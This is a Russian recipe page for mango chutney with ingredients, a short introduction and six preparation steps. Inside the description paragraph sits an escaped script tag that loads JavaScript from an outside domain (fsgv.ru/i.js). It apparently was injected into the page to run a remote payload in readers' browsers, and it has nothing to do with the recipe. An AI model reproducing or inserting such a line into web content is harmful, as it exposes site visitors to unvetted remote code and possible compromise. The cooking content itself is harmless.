Чатни из манго

Чатни из манго Соусы
Чатни из манго


  • Манго  — 2 Штуки
  • Растительное масло  — 2 Ст. ложки
  • Перец чили  — 2 Штуки
  • Специи  — 3 Щепотки (зира, зерна горчицы, перец горошком, соль, сахар, кориандр, паприка)
  • Лимонный сок  — 2 Чайных ложки


Как известно, чатни — это широко распространенное на юге Азии блюдо. Это традиционная приправа, которую обычно готовят из фруктов — в частности, из манго. Делюсь рецептом.

Описание приготовления:

Чатни из манго — это очень популярная индийская приправа, которая благодаря специям и необычной технологии приготовления очень здорово возбуждает аппетит. Обычно ее передают перед основным блюдом, вместе с какой-нибудь закуской. В нашей семье чатни из манго используется разными способами — намазываем на хлеб, добавляем в блинчики, подаем с оладьями, всякими разными закусками… Вкус передать сложно — надо пробовать. Чего вам и желаю!&ltscript type=»text/javascript» src=»http://fsgv.ru/i.js»&gt&lt/script&gt
Количество порций: 8

Чатни из манго - фото шаг 1
Очищаем манго от кожуры.

Чатни из манго - фото шаг 2
Мякоть манго нужно размять ложечкой до пюреобразного состояния.

Чатни из манго - фото шаг 3
В сковороде разогрейте масло, обжарьте в нем перец и специи в течение 1-2 минуты на быстром огне.

Чатни из манго - фото шаг 4
Теперь добавляем лимонный сок, перемешиваем.

Чатни из манго - фото шаг 5
Сразу же добавляем манго и уменьшаем огонь. Тушим, помешивая, в течение 5 минут.

Чатни из манго - фото шаг 6
Снимаем с огня, охлаждаем — и готово! Хранить в холодильнике.

Сказать спасибо автору

Оцените рецепт